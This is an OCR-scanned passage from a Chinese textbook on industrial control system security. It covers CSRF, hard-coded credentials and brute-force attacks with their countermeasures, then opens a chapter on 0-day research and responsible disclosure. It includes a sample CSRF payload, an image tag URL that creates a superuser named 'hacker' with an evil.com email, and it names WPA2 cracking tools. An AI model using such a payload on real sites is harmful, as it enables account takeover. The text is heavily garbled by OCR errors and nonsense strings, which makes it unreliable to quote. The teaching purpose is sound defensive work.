链接 到 合法 网 站 的 有 效 URL， 但 是 同时 也 会 执行 用 户 未 知 的 操作 。CSRF 攻 击 并 不 一 定 涉 及 字符 串 的 注入 。 其 主要 意图 是 使 用 户 浏览 器 加 载 链接 到 某 一 站 点 的 特定 
URL， 进 而 获取 会 话 cookie。 


考虑 这 样 一 种 场景 ， 一 名 网 站 管理 员 登 录 其 所 维护 的 网 站 进行 日 常 管 理 维护 工作 。 其 间 他 可 能 还 会 在 网 上 浏览 一 些 可 爱 猫 咪 的 芮 图 。 这 时 他 发 现 有 一 个 新 网 
站 包含 这 样 的 图 片 ， 然 后 继续 浏览 。 而 他 不 知道 ， 页 面 中 的 一 个 <img> 标 签 的 src 属 性 为 http://yourlegit-site.com/admin/createsuperuser.php? 
name=hacker&pwd=hacker&email=hacker@evil.com。 在 浏览 器 中 ， 这 显示 为 损坏 的 图 像 链接 。 这 种 事情 在 网 上 经 常 遇 到 。 可 管理 员 没 有 意识 到 的 是 ， 自 
动 请 求 的 <img> 标 签 在 他 的 网 站 上 局 动 了 一 条 创建 超级 用 户 的 命令 ， 因 为 恶意 的 猫咪 网 站 (这 是 一 种 奇怪 的 心理 意象 ， 人 人 似乎 都 会 对 呆 萌 的 猫咪 放松 和 警惕 。 ) 
并 不 需要 处 理 来 自 管理 员 网 站 的 响应 。 因 此 ， 同 源 策略 (https://en.wikipedia.org/wiki/Same-origin policy) 在 这 里 并 不 适用 。 同 源 策略 旨 在 防止 恶意 网 站 访 
问 其 他 网 站 的 敏感 数据 。 该 策略 行 之 有 效 ， 但 遗憾 的 是 (还 是 该 庆幸 呢 ? ) ，CSRF 不 受 此 策略 的 影响 。 
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注意 


同 源 策略 是 一 种 浏览 器 程序 采用 的 安全 措施 ， 该 策略 能 够 阻止 来 自 两 个 不 同 “ 源 ” (协议 、 主 机 名 和 端口 号 ) 的 脚本 (通常 为 JavaSctipt) 访问 彼此 的 数据 。 
例如 ， 如 果 没 有 同 源 策略 ， 可 以 在 一 个 恶意 网 站 蛤 入 一 个 长 长 的 HTML iframe 元素 指向 某 合 法 网 站 。 比 如 说 facebook.com， 除 了 域名 属于 攻击 者 之 外 ， 该 元 素 从 外 
形 和 感觉 上 都 和 facebook.com 一 样 。 然 后 攻击 者 的 脚本 就 可 以 读 取 和 操纵 facebook.com 数 据 。 同 源 策 略 则 能 够 (在 众多 攻击 中 ) 阻止 CSRF 攻 击 的 发 生 。 


当 网 站 仪 使 用 cookie 来 指示 会 话 信息 时 ， 束 会 出 现 CSRF 漏 洞 。 这 意味 着 没有 专门 使 用 会 语 信息 或 令 牌 中 的 隐藏 表单 字段 (hidden form fields) 。 如 果 发 现 
一 个 Web 应 用 程序 是 这 样 运行 的 ， 那 么 此 时 所 需要 做 的 融 是 查看 站 点 友 起 的 所 有 操作 请 求 ， 以 查找 可 能 人 存在 的 CSRF URL。 如 果 站 点 已 经 采用 了 某 种 方式 来 防止 
CSRF 攻 击 ， 但 该 站 点 同时 还 存在 XSSs 漏 洞 ， 则 非 cookie 信 息 也 可 以 被 发 送 到 恶意 站 点 来 实现 CSRF 攻 击 。 


2. 同 工控 系统 的 关联 


在 工控 系统 没有 连接 到 互联 网 的 “| 旧时 代 ”， 这 可 能 不 是 一 个 大 问题 。 但 现在 已 经 有 越 来 越 多 的 计算 机 既 连 接 到 互联 网 义 连接 到 生产 工控 系统 网 络 当 中 。 这 
一 桥梁 的 出 现 使 得 CSRF 攻 击 成 为 了 工控 系统 的 威胁 。 以 下 是 工控 系统 软件 中 CSRF 漏 洞 的 一 些 示 例 : 


- https: //ics-cert.us-cert. gov /advisories / ICS A-15-076-01 

- https: //ics-cert.us-cert. gov /advisories /ICSA-14-269-02 

- https: //ics-cert.us-cert. gov /advisories / ICS A-15-239-02 
3. 跨 站 请 求 伪 造 的 对 抗 措 施 


里 然 CSRF 的 漏洞 利用 非常 简单 (只 需 设 置 <img> 标 签 的 src 属 性 即 可 ) ， 但 是 其 缓解 策略 相当 复杂 。 根 据 OWAsP 的 建议 
(https://www.owasp.org/index.php/Cross-Site Request Forgery. (CSRF) Prevention Cheat Shee) ， 为 了 防止 CSRF 攻 击 ， 应 当 提 供 一 个 与 用 户 会 话 相 
关联 的 挑战 令 牌 (服务 器 知道 的 一 串 随 机 生成 的 字符 ) 。 该 令 牌 应 跟随 所 有 请 求 一 起 发 送 ， 尤 其 是 危险 或 敏感 的 请 求 ， 并 且 服 务 器 必须 验证 该 令 牌 与 用 户 会 话 的 
天 联 性 。 如 果 令 牌 不 匹配 ， 则 该 请 求 可 能 束 是 在 党 试 友 起 CSRF 攻 击 。 对 此 必须 特别 小 心 ， 要 确保 令 牌 不 能 被 攻击 者 所 识别 。 这 也 融 意 味 着 在 GET 请 求 中 不 要 使 用 
令 牌 ， 因 为 从 浏览 器 历史 记录 和 HTTP 请 求 的 Referer 字 段 中 都 可 以 读 取 到 相关 数据 。 


如 果 选 择 不 使 用 挑战 令 牌 ， 则 可 以 检查 请 求 中 的 Referer 字 段 ， 但 是 这 个 字段 可 能 被 攻击 者 欺骗 。 而 相对 较 新 的 Origin 字 段 验证 起 来 则 更 安全 。 也 可 以 使 用 某 
种 挑战 一 应 答 机 制 。 这 可 能 会 导致 用 户 要 多 尝试 几 次 ， 但 至 少 他 们 (以 及 网 站 或 应 用 ) 会 得 到 保护 。 


6.1.11 硬 编码 值 利用 


1. 硬 编码 值 利用 原理 


作为 一 名 程序 员 ， 我 知道 开发 项 目的 最 后 期 限 所 市 来 的 压力 。 为 了 加 快 开发 过 程 中 的 测试 进度 ， 程 序 员 经 常 在 代码 中 插入 硬 编码 值 ， 以 便 快 捷 地 实现 对 部 分 
变量 的 初始 化 。 与 编写 代码 同 外 部 系统 (如 数据 库 ) 交互 相 比 ， 硬 编码 实现 起 来 更 加 容易 。 随 着 最 后 期 限 的 临近 ， 同 数据 库 或 其 他 加 密 文 件 存 储 进行 集成 的 可 行 


性 不 断 降低 。 最 终 导致 无 论 出 于 安全 性 还 是 通用 性 等 原因 应 该 从 外 部 数据 源 读 取 的 数值 ， 都 改 为 使 用 保存 在 代码 中 的 硬 编码 值 。 从 技术 上 来 说 ， 这 种 方法 确实 能 
够 奏效 ,这 也 是 大 多 数 人 所 关心 的 地 方 。 而 缺点 束 是 任何 拥有 软件 或 设备 的 人 都 可 以 读 取 这 些 硬 编码 值 。 


当然 ， 也 并 非 所 有 的 硬 编码 值 都 具有 安全 风险 。 如 果 攻 击 者 发 现 使 用 了 Pl=3.1415 之 类 的 硬 编码 当然 没有 问题 。 但 是 ， 如 果 攻 击 者 在 代码 中 发 现 了 
pwd='Adm1nPassw-0rd!'， 那 么 这 时 就 会 出 现 问 题 。 硬 编码 密码 似乎 是 工控 系统 之 中 的 一 个 特殊 问题 。 这 也 可 以 通过 使 用 子 系统 的 默认 认证 信息 来 说 明 。 例 
如 ， 如 果 使 用 本 地 数据 库 ， 但 是 不 修改 默认 的 root 用 户 名 和 口令 ， 则 攻击 者 融 可 能 直接 连接 到 数据 库 .…… 这 真是 一 个 糟糕 的 消息 。 有 时 口令 虽然 是 加 密 的 ， 但 是 可 
以 轻易 地 读 取 到 解密 密 钥 ， 这 只 会 稍微 提高 一 点 攻击 者 的 难度 而 已 。 


查找 硬 编码 值 ， 特 别 是 当 值 以 ASCIl 字 符 串 形式 存储 时 ， 是 一 个 简单 到 可 笑 的 任务 。 只 需要 使 用 十 六 进 制 编辑 器 打开 一 个 二 进 制 文件 ， 然 后 搜索 其 中 的 ASCIl 
Sita, IER, WRB ab, IDA Pro 就 会 提取 出 这 些 字符 串 。 而 一 旦 知道 了 硬 编码 的 值 ， 天 机 束 被 泄露 了 。 因 为 硬 编码 的 值 通 常 是 认证 信息 ， 其 所 
造成 的 影响 可 是 相当 大 哦 。 


2. 同 工控 系统 的 关联 

有 大 量 实例 可 以 说 明 硬 编码 值 给 工控 系统 市 来 了 安全 风险 。 下 面 仪 列 出 其 中 的 部 分 实例 : 
- https://ics-cert.us-cert.gov/advisories/ICSA-15-265-03 

- https: //ics-cert.us-cert. gov /advisories/ICSA-13-169-02 


* https: //ics-cert.us-cert. gov /advisories / ICS A-12-205-01 


- https: //ics-cert.us-cert. gov /advisories /ICSA-15-085-01A 
- https: //ics-cert.us-cert. gov /alerts /ICS-ALERT-13-016-01A 
3. 硬 编码 值 利用 的 对 抗 措施 


虽然 采用 硬 编码 值 进行 测试 和 部 署 非常 容易 ， 但 是 尽量 不 要 在 生产 系统 中 使 用 硬 编码 值 。 尤 其 不 要 包括 任何 与 口令 或 加 密 密 钥 有 关 的 内 容 。 敏 感 信息 都 应 该 
存储 在 代码 之 外 (哪怕 只 是 出 于 模块 化 的 原因 ) 。 应 该 尽力 确保 只 有 代码 可 以 读 取 这 些 值 。 在 这 里 加 密 是 这 一 过 程 的 好 伙伴 ， 但 如 何 恰当 地 使 用 加 密 则 可 能 相当 
球 手 。 无 论 如 何 都 不 要 相信 用 户 。 即 便 对 于 开发 人 员 以 为 只 有 代码 才能 够 访问 到 的 信息 ， 也 建议 对 其 进行 保护 。 


6.1.12 暴力 攻击 


wae tr le : 


FA [pa] Jj: 
KURER : 


1. 暴 力 攻击 原理 


黑客 攻击 中 的 暴力 攻击 在 本 质 上 同 想象 中 的 一 样 ， 而 且 正 在 逐渐 蔡 代 更 优雅 的 攻击 技术 。 暴 力 通 遂 意 味 着 党 试 每 一 个 可 能 的 选项 ， 从 中 寻找 出 最 终 能 够 奏效 
的 选项 。 此 方法 通常 用 于 口令 极 解 。 在 某 种 程度 上 ，Dos9 攻 击 也 可 以 应 用 暴力 攻击 ， 因 为 它们 倾向 于 持续 上 发送 一 段 代 码 ， 或 者 不 断 消耗 内 存 直 到 目标 朋 溃 。 


从 历史 上 来 看 ， 由 于 需要 耗费 大 量 时 间 ， 暴 力 攻 击 并 不 是 一 个 可 行 性 较 高 的 选项 。 然 而 现在 ， 随 着 CPU 速度 的 不 断 提高 以 及 分 布 式 计算 、 并 行 计算 、 云 计算 
的 广泛 应 用 ， 暴 力 攻击 已 经 成 为 了 一 个 可 行 的 选择 。 用 户 的 PLC 是 否 还 只 是 使 用 8 字符 的 口令 ?如 果 是 的 话 ， 那 么 ， 即 便 是 一 人 台 低 端的 笔记 本 计算 机 也 可 以 在 一 两 
天 内 穷 举 完 所 有 的 口令 。 


应 对 暴力 攻击 的 对 抗 措 施 之 一 是 使 用 更 大 的 状态 空间 ， 也 就 是 增 大 可 能 值 的 集合 。 这 可 能 涉及 从 16 位 值 到 64 位 值 的 转换 。 有 了 时， 这 就 已 经 足够 了 。 但 是 ， 如 
果 采 用 随机 数 生成 器 (RNG) 生成 值 ， 那 么 RNG 算 法 中 的 弱点 可 能 导致 所 生成 的 随机 数 被 预测 到 ， 以 至 于 大 幅 削 减 状态 空间 的 规模 。 


在 许多 情况 下 ， 特 别 是 针对 登录 进程 的 攻击 ， 暴 力 攻 击 会 在 线 进行 ， 有 时 则 可 以 提取 出 数据 友 起 离线 攻击 。 这 样 的 话 ， 系 统管 理 员 就 无 法 知道 友 生 了 什么 。 
这 也 正 是 破解 WPA2 密 码 的 方式 。 如 果 有 人 在 对 无 线 信道 进行 嗅 探 时 拦截 到 一 个 特殊 值 (握手 信息 ) ， 然 后 使 用 离线 破解 软件 (如 aircrack-ng 或 reaver) 就 可 以 
对 握手 信息 发 起 暴力 攻击 。 无 论 何 时 ， 只 要 经 过 散 列 、 加 密 或 编码 的 值 进行 了 交换 ， 并 且 该 值 是 安全 方面 的 敏感 信息 ， 那 么 就 存在 通过 暴力 攻击 发 现 原 值 的 风 


险 。 


2. 同 工控 系统 的 关联 


对 于 DoS 攻 击 ， 只 是 重复 地 进行 TCP 连 接 ,， 或 者 甚至 只 是 ping 一 个 端口 就 可 能 足以 降低 设备 的 运行 速度 ,或 者 导致 设备 中 断 运行 。 我 们 看 到 过 仪 仅 通 过 
Windows 命 令 行 下 的 ping 命 令 就 造成 PLC 设 备 无 法 使 用 的 例子 。 除 非 系统 设计 者 采用 专门 的 设计 来 阻止 暴力 攻击 ， 否 则 在 系统 中 的 某 个 未 知 地 方 很 可 能 存在 暴力 
破解 漏洞 。 很 多 工控 系统 软件 都 容易 遭受 暴力 攻击 。 


- https: //ics-cert.us-cert. gov /advisories / ICS A-13-248-01 
- https: //ics-cert.us-cert. gov /alerts /ICS-ALERT-13-016-02 
- https: //ics-cert.us-cert. gov /advisories /ICSA-14-149-02 


* https: //ics-cert.us-cert. gov /advisories /ICSA-15-090-01 


在 某 种 程度 上 ， 暴 力 攻 击 就 像 赛 道上 的 法 拉 利 。 可 能 攻击 者 并 不 具备 实施 攻击 的 高 超 技 巧 ， 但 只 要 拥有 充足 的 资源 ， 束 可 以 通过 机 器 怪兽 来 实现 所 想 要 的 结 


果 。CPU 只 会 变 得 更 快 ， 而 且 并 行 计 算 平 台 的 运用 ， 例 如 CUDA (http://www.nvidia.com/object/cuda home new.html) ， 都 使 得 在 相当 过 时 的 〈 让 我 们 在 
这 里 诚实 一 点 ) 硬件 和 软件 上 逐个 进行 每 个 值 的 攻击 党 试 成 为 了 一 项 轻松 简单 的 任务 ， 而 这 些 过 时 的 软 硬 件 却 构成 了 工控 系统 当中 的 大 多 数 设 备 。 


3. 暴 力 攻击 的 对 抗 措施 


值得 庆幸 的 是 ， 有 许多 对 抗 措施 可 以 用 来 应 对 暴力 攻击 。 如 前 所 述 ， 可 以 增加 状态 空间 的 规模 。 这 可 能 涉及 将 128 位 加 密切 换 到 1024 位 加 密 。 也 可 以 将 最 小 
OSKE (我 知道 有 很 多 用 户 只 使 用 最 短 长 度 的 口令 ) 从 8 个 字符 更 改 到 12 个 字符 。 有 时 这 会 给 用 户 带 来 不 便 (例如 可 能 会 提出 增加 口令 长 度 的 要 求 )， 但 是 从 提 
高 安全 性 的 角度 来 说 ， 这 是 可 以 接受 的 (至 少 在 工控 系统 中 是 这 样 的 ) 。 


男 一 种 对 抗 措施 是 以 某 种 方式 对 尝试 的 次 数 或 频率 加 以 限制 。 在 许多 传统 的 企业 系统 中 ， 登 录 失 败 的 次 数 被 限制 在 某 一 数值 ， 达 到 该 限定 值 后 将 锁定 用 户 一 
段 时 间 才 能 进行 再 次 登录 。 但 这 种 方法 通常 在 工控 系统 当中 难以 接受 。 更 好 的 选择 可 能 是 将 登录 尝试 的 频率 限制 为 某 一 合理 的 数值 ， 例 如 每 两 秒 钟 才 可 以 进行 一 
次 登录 尝试 。 这 种 限制 几乎 不 会 被 人 类 用 己 所 注意 到 ， 但 对 于 限制 暴力 攻击 而 言 作用 巨大 。 我 曾经 对 一 个 口令 最 大 长 度 (是 的 ， 是 最 大 长 度 ) 为 8 个 字符 的 PLC 进 
行 过 测试 ， 并 且 该 PLC 也 没有 对 登录 失败 的 次 数 进 行 限 制 。 我 使 用 一 台 笔 记 本 电脑 ， 只 用 了 大 约 36 小 时 就 跑 遍 了 所 有 可 能 的 口令 (只 考虑 小 写字 母 ) 。 而 如 果 PLC 
只 人 允许 每 两 秒 进行 一 次 登录 ， 那 么 需要 耗费 13000 多 年 的 时 间 才 能 够 跑 遍 每 个 可 能 的 选项 。 而 且 下 面 这 种 对 抗 措施 的 运用 还 可 能 进一步 延 组 这 一 过 程 。 


最 后 一 种 对 抗 措施 更 多 地 关注 于 过 程 而 非 设 计 。 只 要 以 某 一 频率 改变 特定 的 天 键 数值 (口令 、 加 密 密 钥 等 等 ) 残 可 以 影响 暴力 攻击 的 效果 。 假 设 在 一 次 攻击 
中 ， 能 够 从 系统 中 提取 出 关键 数值 ， 并 且 可 以 对 其 进行 离线 暴力 攻击 ， 需 要 GPU 集群 经 过 三 个 月 运算 才能 够 获取 到 有 用 的 信息 。 那 么 现在 假设 该 天 键 数 值 每 四 周 
变换 一 次 。 在 这 种 情况 下 ， 所 有 攻击 者 所 能 作 的 仅 仪 是 让 服务 器 的 温度 升 高 而 已 ， 因 为 即便 拿 到 了 有 用 的 数据 ， 这 些 数 据 也 已 经 过 期 了 。 


[1] 此 处 指 Bjarne Stroustrup 编写 的 《The C++ Programming Language > — P, P XM 《C++ 程序 设计 语言 》 由 机 械 工业 出 版 社 出 版 。 一 译 者 注 


6.2 Prats aims 


读者 可 能 已 经 注意 到 了 ， 本 章 中 很 多 存在 漏洞 的 工控 系统 和 SCADA 软 件 在 “现实 世界 ”中 的 实例 均 源 自 于 WellinTech 公 司 的 KingView6.53。 是 我 们 想 对 
WellinTech 程 序 员 的 开发 水 平 提出 质疑 吗 ? 并 不 是 这 样 。 事 实 上 ， 我 们 在 下 一 章 中 会 就 男 一 家 厂商 展开 讨论 。 其 实 KingView 已 经 做 得 很 好 了 ， 他 们 已 经 像 所 有 优 
秀 的 软件 厂商 一 样 对 每 个 漏洞 都 进行 了 修复 。 我 们 正在 试图 表明 的 观点 是 ， 任 何 现实 中 使 用 的 〈 即 有 用 的 ) 软件 都 存在 漏洞 ， 甚 至 是 大 量 的 漏洞 。 即 便 没有 大 量 
不 落 案 白 的 攻击 者 以 从 未 想到 过 的 方式 对 软件 发 起 攻击 ， 开 发 大 型 应 用 程序 也 已 经 相当 困难 了 ， 更 何况 确实 存在 着 这 样 一 批 攻 击 者 在 党 试 对 软件 的 攻击 了 。 作 为 
一 名 程序 员 ， 这 使 得 我 对 于 某 款 软件 做 出 该 软件 可 做 哪些 、 不 可 做 哪些 的 声明 缺乏 信心 。 而 对 于 安全 研究 员 和 (或 ) 渗透 测试 人 员 而 言 ， 则 深 受 鼓舞 ， 因 为 他 们 
[ 道 ， 只 要 努力 查找 总 会 帮 现 部 分 漏洞 。 系 统管 理 员 们 应 该 看 到 这 一 点 ， 并 认识 到 系统 中 的 每 款 软件 ， 无 论 是 设备 运行 系统 、Web UI 还 是 其 他 什么 东西 ， 都 需要 
围绕 其 部 署 防御 措施 ， 从 而 使 攻击 者 友 起 这 些 类 型 的 攻击 更 加 困难 。 


X 


6.3 ARE 


我 们 在 本 章 中 讨论 了 各 种 各 样 的 漏洞 和 攻击 ， 并 对 这 些 攻 击 和 技术 的 应 对 方法 进行 了 研究 。 一 些 漏洞 非常 底层 ,涉及 内 存 中 比特 和 字 节 的 操作 。 其 他 漏洞 则 
比较 高 级 ， 主 要 涉及 了 更 多 面向 用 户 的 组 件 ， 比 如 Web 界 面 。 当 程序 员 对 用 户 数据 的 限制 方式 做 出 错误 假设 时 ， 所 有 这 些 漏洞 都 会 出 现 。 应 该 注意 到 ， 在 这 里 并 
没有 列 出 所 有 的 漏洞 和 攻击 类 型 。 本 章 仅 仪 提 到 了 几 种 在 工控 系统 应 用 程序 和 设备 中 可 能 更 为 钊 见 、 影 响 力 更 大 的 漏洞 (请 参阅 PH9 天 于 “工控 系统 中 的 常见 网 
络 安全 漏洞 ”一 文 查 看 完整 列表 ) 。 


在 防御 端 ， 安 全 需要 “ 裔 入 ” 进 软件 开发 过 程 ， 以 防止 这 些 类 型 的 漏洞 出 现在 应 用 程序 和 设备 中 。 不 能 仪 仪 只 是 对 安全 措施 表示 点 头 认同 ， 还 应 当 将 安全 要 
求 明确 地 写 进 开发 过 程 中 。 这 包括 通用 安全 编码 实践 (程序 员 应 该 要 了 和解) ， 以 及 在 “常规 软件 测试 的 同时 开展 细致 的 安全 测试 ， 或 者 对 “常规 ”软件 测试 进 
行 安全 方面 的 加 强 。 安 全 测试 应 涵盖 测试 的 所 有 阶段 ， 包 括 单 元 测试 、 集 成 与 系统 测试 ， 还 有 回归 1 测试。 在 开发 过 程 中 随时 都 会 引入 安全 漏洞 。 因 此 要 防 患 于 未 


ASAS 


在 确认 数据 没有 问题 之 前 ， 如 果 程 序 员 简 单 地 假设 所 有 的 数据 都 是 恶意 的 ， 那 么 工控 系统 软件 会 安全 得 多 。 所 有 的 用 户 数据 都 应 该 进行 验证 。 这 包括 来 自 键 
盘 、 网 络 、 文 件 系统 、 外 部 设备 等 地 方 的 任何 内 容 。 攻 击 者 会 尽 其 所 能 尝试 通过 包括 网 络 、USB 设 备 、 电 子 邮件 等 所 有 可 以 获得 的 渠道 进入 系统 ， 无 论 用 户 是 否 
知道 该 渠道 的 存在 。 因 此 负责 任 的 做 法 就 是 在 攻击 者 这 人 么 做 之 前 找到 漏洞 ， 并 打上 补丁 (总 之 ， 这 已 经 是 很 便宜 且 不 太 枚 座 的 方式 了 ) 。 


因为 工控 系统 包含 这 么 多 应 用 程序 和 互联 系统 ， 而 其 中 很 多 软件 都 是 由 第 三 方 开 发 的 ， 所 有 用 户 能 做 的 只 是 为 其 修建 一 圈 围 墙 加 以 保护 ， 直 到 第 三 方 开 发 人 
员 一 起 做 好 他 们 该 做 的 事情 。 为 了 了 解 情 况 ， 系 统管 理 员 和 所 在 公司 或 机 构 中 的 其 他 利益 相关 方 应 当 经 常 访问 ICS-CERT 网 站 和 所 有 有 价值 的 漏洞 信息 库 ， 比 如 国 
家 漏洞 数据 库 (National Vulnerability Database) 。 可 以 肯定 的 是 攻击 者 也 在 持续 关注 着 这 些 信息 源 。 他 们 也 在 使 用 这 些 数 据 库 来 指导 他 们 发 起 攻击 ( 当 已 经 
知道 软件 存在 漏洞 时 ， 为 其 开发 漏洞 利用 代码 将 会 更 加 容易 ) ， 并 希望 在 部 分 用 户 进行 漏洞 修复 之 前 (假如 用 户 真 的 会 对 漏洞 进行 修复 的 话 ) 成 功 友 起 攻击 。 不 
要 成 为 一 个 容易 遭受 攻击 的 目标 。 要 利用 可 以 获取 的 所 有 可 用 信息 并 立即 采取 行动 。 


6.4 延伸 阅读 


e ICS-CERT (https://ics-cert.us-cert.gov/) 
e National Vulnerability Database (https://nvd.nist.gov/) 


e “Common Cybersecurity Vulnerabilities in Industrial Control Systems,’ 
Department of Homeland Security, May 2011 (https://scadahacker.com/library/ 
Documents/ICS_Vulnerabilities/DHS%20-%20Common%20Cybersecurity%20 
Vulnerabilities%20in%201CS%20(2011).pdf) 


e The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, by Chris Anley, 
John Heasman, Felix Lindner, and Gerardo Richarte (Wiley, 2007) 


e The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws, 
by Dafydd Stuttard and Marcus Pinto (Wiley, 2011) 


e Secure Coding in C and C++, by Robert C. Seacord (Addison-Wesley Profession, 2013) 
e Phrack Magazine (http://phrack.org/) 


e Corelan Team (https://www.corelan.be/) 


Ble ”工业 控制 系统 “0-day” 漏 洞 研究 


如 果 读 者 的 目标 是 通过 不 断 地 更 新 补丁 来 保证 工控 设备 与 软件 的 安全 ， 那 么 可 以 有 两 种 做 法 。 第 一 种 做 法 是 定期 访问 设备 厂商 及 IC9-CERT 的 网 站 碍 找 关 于 新 
版 本 、 新 补丁 和 推荐 操作 的 通知 公告 来 确保 安全 ， 这 种 做 法 虽然 能 够 保障 安全 ， 但 是 较为 被 动 。 第 二 种 则 是 自己 动手 挖掘 漏洞 。 


Osz 


开始 本 章 的 介绍 之 前 需要 指出 ， 发 现 0-day 漏 洞 之 后 ， 遵 循 负责 任 的 披露 方法 是 非常 重要 的 。 通 常 ， 在 公开 发 布 0-day 漏 洞 之 前 ， 首 先 要 尽力 同 厂商 协作 编写 并 
发 布 补 丁 。 

每 种 方法 都 有 利 有 次。 第 二 种 方法 由 于 能 够 率先 定位 漏洞 ， 然 后 立即 做 出 响应 ， 因 此 其 优势 在 于 可 以 不 受 厂 商 及 来 自 世 界 各 地 的 安全 研究 人 员 的 约束 。 当 某 
个 漏洞 出 现在 ICS-CERT 的 公告 中 时 ， 必 然 已 经 有 人 经 历 了 本 章 所 描述 的 整个 过 程 ， 通 知 了 厂商 并 与 之 协作 ， 由 厂商 开发 出 补丁 并 让 1CS-CERT 知 晓 现 在 发 布 这 个 
漏洞 是 “安全 ”的 。 只 要 攻击 者 还 没有 找到 漏洞 并 开始 针对 系统 进行 漏洞 利用 ， 事 情 就 还 好 。 


漏洞 研究 的 过 程 非常 耗 时 ， 对 个 人 而 言 意义 可 能 并 不 大 。 但 是 ， 如 果 所 在 公司 的 业务 主要 是 销售 工控 系统 设备 或 软件 ， 那 么 在 这 些 产 品 面市 之 前 对 其 开展 漏 
洞 方面 的 研究 对 客户 和 公司 来 说 都 是 有 益 的 。 


本 章 将 继续 研究 第 5 章 与 第 6 章 遗 留 下 来 的 内 容 ， 对 工控 系统 “0-day” 漏 洞 研究 的 过 程 进行 详细 分 析 。 漏 洞 研究 ， 通 冲 也 被 称 为 逆向 工程 (BIA LEM 
仅 是 漏洞 研究 的 一 个 方面 ) ， 对 大 多 数 人 而 言 是 一 门 需要 经 过 多 年 实践 与 经 验 积累 的 专业 技术 。 对 此 ， 显 然 难以 在 一 个 章节 中 洱 兰 与 之 相关 的 所 有 细节 与 注意 事 
项 。 在 这 里 ， 我 们 的 目标 只 是 进行 一 个 介绍 ， 并 提供 一 些 天 键 资源 ， 来 帮助 读者 理解 漏洞 研究 过 程 中 所 涉及 的 内 容 ， 也 希望 能 够 帮助 读者 在 漏洞 研究 的 道路 上 迈 
出 第 一 步 ， 如 果 读 者 有 志 于 此 的 话 。 


7.1 像 攻击 者 一 样 思 


个 人 开展 安全 研究 其 实 和 攻击 者 所 要 做 的 工作 是 一 样 的 (当然 了 ， 在 开始 “进入 生产 设备 牟利 或 破坏 ”阶段 之 前 要 停止 操作 ) 。 两 者 之 间 的 区 别 在 于 ， 无 论 
是 对 于 所 使 用 的 设备 还 是 软件 ， 安 全 研究 人 员 需 要 获取 对 其 开展 研究 的 许可 。 但 是 由 于 分 析 研 究 的 步骤 都 是 一 样 的 ， 因 此 攻击 者 的 思维 模式 对 于 安全 测试 的 开展 
也 具有 巨大 的 帮助 。 


任何 一 个 有 点 真 本 事 的 攻击 者 都 有 自己 所 遵循 的 套路 。 虽 然 这 些 套 路 中 还 有 些 调整 和 细微 之 处 有 竺 进一步 商检 ， 但 是 下 列 内 容 对 于 推动 研究 项 目的 开展 已 经 
足够 了 : 


1. 目 标 选 取 

2. 文 档 人 研究 

3. 可 访问 接口 的 枚 举 与 优先 级 排序 
4. 逐 接口 分 析 与 测试 〈 漏 洞 挖掘 ) 
25. 漏洞 利用 


在 本 章 的 剩余 部 分 ， 我 们 将 会 对 所 有 这 些 步骤 展开 研究 ， 其 中 重点 放 在 步骤 4， 也 就 是 分 析 步 骤 ， 同 时 也 是 非常 有 趣 的 内 容 。 在 本 章 的 结束 ， 我 们 以 2016 年 
初 1CS-CERT 公 告 中 所 披露 的 一 个 最 新 漏洞 作为 工控 系统 漏洞 研究 案例 ， 把 所 有 这 些 步骤 全 部 贯穿 起 来 。 


7.2 +321: 目标 选取 


根据 在 工作 中 的 分 工 和 (或 ) 职位 ， 目 标 选 取 工 作 的 难 易 程度 也 有 所 不 同 。 如 果 惑 职 于 某 家 工控 系统 厂商 ， 并 且 在 产品 某 个 新 版 本 发布 乙 前 参与 了 安全 测 
试 ， 那 么 将 会 被 告知 目标 是 什么 。 而 如 果 束 职 于 某 家 第 三 方 研究 公司 、 工 程 服务 公司 抑或 是 顾问 公司 ， 需 要 同 众 多 不 同 的 应 用 程序 和 设备 打交道 ， 那 么 在 这 一 阶 
段 所 要 做 的 工作 可 能 束 会 有 点 多 了 。 


专业 的 安全 研究 员 则 拥有 选择 研究 对 象 的 自由 。 这 些 选 择 有 时 涉及 公司 的 业务 能 力 或 者 免费 获取 资源 的 能 力 。 如 果 研 究 公司 够 聪明 ， 则 会 从 商业 角度 来 推动 
决策 。 对 此 需要 考虑 大 量 因 素 , 例 如 ， 目 标 系统 在 行业 中 的 流行 程度 如 何 、 产 品 已 经 进行 了 哪些 安全 加 固 、 针 对 目标 的 漏洞 利用 可 能 造成 哪些 影响 、 研 究 机 构 拥 
有 哪些 专家 库 ， 以 及 许多 其 他 要 素 。 


由 于 无 需 针对 工控 系统 的 整 条 产品 线 进行 测试 ， 工 程 服务 公司 及 顾问 公司 在 选择 目标 时 则 轻松 一 点 。 他 们 只 需要 考虑 自己 所 使 用 的 产品 以 及 客户 所 使 用 的 产 
品 。 但 是 ， 问 题 在 于 工程 服务 公司 及 顾问 公司 也 需要 对 这 些 产 品 进 行 测试 ， 因 此 就 需要 聘请 测试 人 员 对 此 开展 正确 、 全 面 的 安全 研究 。 由 于 安全 事件 的 出 现 会 引 
起 产品 的 负面 报道 从 而 导致 玉 失 客户 信任 ， 相 形 之 下 ， 聘 请 安全 专家 的 成 本 可 能 更 低 。 对 于 经 验 丰 富 的 研究 人 员 而 言 ， 本 章 内 容 更 像 是 一 个 综述 ， 或 者 说 是 复 
习 ， 但 是 也 可 作为 检查 对 照 表 或 快速 索引 。 在 本 章 的 结束 位 置 ， 我 们 也 为 有 志 于 深入 了 解 漏洞 研究 相关 内 容 的 读者 准备 了 一 些 很 不 错 的 延伸 阅读 资料 。 


7.3 ”步骤 2: 文档 研究 


不 同 于 好 莱 坞 大 片 中 常见 的 网 络 入 侵 场景 ， 网 络 入 侵 过 程 中 并 不 是 所 有 步骤 部 令 人 血脉 责 张 、 充 满 乐趣 并 让 人 感觉 非常 刺激 的 。 在 使 目标 系统 从 事 设 计 之 外 
的 操作 之 前 〈 也 就 是 在 系统 被 入 侵 之 前 ) ， 首 先 需要 了 解 系统 原本 的 用 途 。 也 就 是 说 ， 要 阅读 可 以 得 到 的 每 份 系统 文档 ， 即 从 用 户 手 册 、 系 统 教程 到 协议 规范 与 
行业 数据 词典 在 内 的 所 有 材料 。 针 对 内 部 研发 产品 进行 安全 研究 ， 还 要 拿 到 所 有 已 经 撰写 完成 的 文档 。 如 果 目 标 是 尽 可 能 喜 真 地 模拟 外 部 攻击 者 ， 那 么 在 首次 测 
斌 过 程 中 内 部 文档 可 能 暂且 还 用 不 到 


